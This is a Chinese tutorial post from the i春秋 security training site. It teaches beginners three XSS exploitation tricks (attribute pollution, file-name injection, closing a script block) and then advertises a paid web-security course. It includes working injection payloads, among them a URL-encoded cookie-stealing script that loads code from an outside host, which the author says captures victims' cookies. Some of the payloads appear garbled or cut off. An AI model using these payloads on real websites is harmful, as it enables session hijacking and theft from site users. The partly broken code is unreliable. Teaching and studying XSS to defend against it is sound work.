【Web安全入门】三个技巧教你玩转XSS漏洞

 

XSS漏洞是Web应用程序中最常见的漏洞之一,想要入门Web安全的小伙伴,这个知识点是必学的。

i春秋官网中有很多关于XSS漏洞的课程,新手小白可以去官网看课学习。

学习地址:https://www.ichunqiu.com/search/XSS漏洞

 

XSS是一种经常出现在Web应用中的计算机安全漏洞,也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇,如何利用XSS漏洞的一些小技巧,希望对大家学习Web安全有所帮助。

污染标签

简单的说,XSS漏洞的本质就是输入与输出。

比如,我的QQ网名是:

"你的网名">

结果就被污染成

<input value="">

 

这样的话我就成功弹窗了,但又有什么用呢?

我们可以构造语句:

<input value=""#ff0000">http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));">

这样我们就能成功打到cookie了。

 

 

文件名称XSS

有些网站有上传点,但是后台并未对文件名做更改。

比如上传以后前端代码是这样的:

<a href="http://127.0.0.1/upload/1.rar">test</a>

1.rar假设就是我们上传的文件。

 

我们是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)

我们就改成:

"><script>alert(1)</script>.rar

这样的话,就变成:

 

 

成功弹窗,如果过滤了尖括号 < >

就可以按照之前讲的标签污染法,让它执行我们的JS语句。

闭合JS

有时候,JS会调用我们网站的一些资料,类似昵称。

<html>

<head>

<script>

name = sqler;

</script>

</head>

<body>

welcome sqler;

</body>

</html>

因为我们昵称是被包含在<head>里,我们无法利用。

这样我们就需要为它打开一个新大门。

</script></head><body><img src=x onerror=alert(1)>

 

这样我们就成功弹窗。

以上就是今天要分享的内容,是不是很简单。

XSS漏洞是Web安全入门必掌握的知识点,当然还有CSRF漏洞、Webshell与文件上传漏洞、SQL注入等等,如果想要全面系统的学习Web安全入门课程,可以到i春秋官网(ichunqiu.com/train)进行报名。

 

快速报名入口:https://www.ichunqiu.com/train/course/11

面向人群

信息安全小白、高等院校信息安全、网络空间安全专业学生、信息安全爱好者、Web应用开发人员。

学习方式

通过在线视频学习资源,结合实验练习,带你全方位学习Web安全。上课期间助教老师实时在互动区进行沟通答疑,若脱离上课时间可在班级内老师答疑模块中进行问题咨询留言。

学习时间

Web安全入门班每月有两次报名机会,大家可以根据自己实际情况进行相应选择,学习时间灵活,非常适合上班族的新手小白们。

课程目标

1、了解Web应用程序架构;

2、熟悉Web常见漏洞原理;

3、掌握Web基础安全漏洞利用方式与防御方法;

4、熟悉渗透测试流程;

5、熟练使用多种渗透测试工具。

课程介绍

课程以漏洞为核心,从Web应用架构、漏洞原理,利用方式与防御方法等,多方面剖析Web应用安全相关知识,并以此为基础学习渗透测试的操作流程及各阶段工作内容,熟悉渗透测试工具的使用。

课程优势

1、低门槛、易学习;

2、知识点配套实验;

3、助教老师答疑。

通过以上内容的介绍,如果还有其他疑问,欢迎大家前来咨询,我们会有更专业的老师为你讲解,给你答疑解惑。谢老师 18513200565(手机、微信同步)

原文地址:https://www.cnblogs.com/ichunqiu/p/11398488.html